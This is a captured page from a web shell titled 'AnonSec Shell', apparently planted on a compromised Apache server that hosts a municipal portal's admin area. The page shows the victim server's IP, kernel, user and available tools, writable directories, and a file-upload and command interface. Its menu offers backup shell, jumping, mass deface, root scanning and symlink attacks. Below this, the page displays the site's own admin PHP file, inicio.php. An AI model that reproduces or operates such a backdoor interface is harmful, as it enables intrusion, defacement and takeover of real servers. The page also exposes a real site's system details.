AnonSec Shell
Server IP : 20.75.53.88  /  Your IP : 216.73.217.72   [ Reverse IP ]
Web Server : Apache
System : Linux VMRALP-3 4.4.0-256-generic #290~14.04.1-Ubuntu SMP Thu Jun 20 09:24:50 UTC 2024 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29+esm15
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
Domains : 3 Domains
MySQL : ON  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/portais/pmapuiares/admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /var/www/html/portais/pmapuiares/admin/inicio.php
<?php
    /**
     * Created by PhpStorm.
     * User: ralpb
     * Date: 24/07/2018
     * Time: 08:53
     */
    $noticias    = $db->select("noticias")->fetch();
    $qtd_noticia = $db->count();
?>
<header>
    <style>
        /* Tablet and bigger */
        @media ( min-width: 768px ) {
            .grid-divider {
                position: relative;
                padding: 10px;
                border-top: 1px solid #3c73ac;
                border-bottom: 1px solid #3c73ac;
                border-left: 1px solid #3c73ac;;
                border-right: 1px solid #3c73ac;
            }

            .grid-divider > [class*='col-'] {
                position: static;
            }

            .grid-divider > [class*='col-']:nth-child(n+2):before {
                content: "";
                border-left: 1px solid #3c73ac;
                position: absolute;
                top: 0;
                bottom: 0;
            }

            .col-padding {
                padding: 0 15px;
            }
        }
    </style>
</header>
<section id="page-content-wrapper">
    <div class="col-md-12">
        <button type="button" class="hamburger is-closed" data-toggle="offcanvas">
            <span class="hamb-top"></span>
            <span class="hamb-middle"></span>
            <span class="hamb-bottom"></span>
        </button>
    </div>

    <section>
        <div class="container">
            <div class='panel-body'>
                <div class="col-md-12">
                    <a class="navbar-brand" href="index.php">
                        <img src="../assets/images/logo/logo.png" width="250px"/>
                    </a>
                </div>
            </div>
            <div class='container'>
                <div class='panel-body'>
                    <div class="col-md-12">
                        <h2>Portal - Administrativo</h2>
                    </div>
                </div>
            </div>
        </div>
    </section>

Anon7 - 2022
AnonSec Team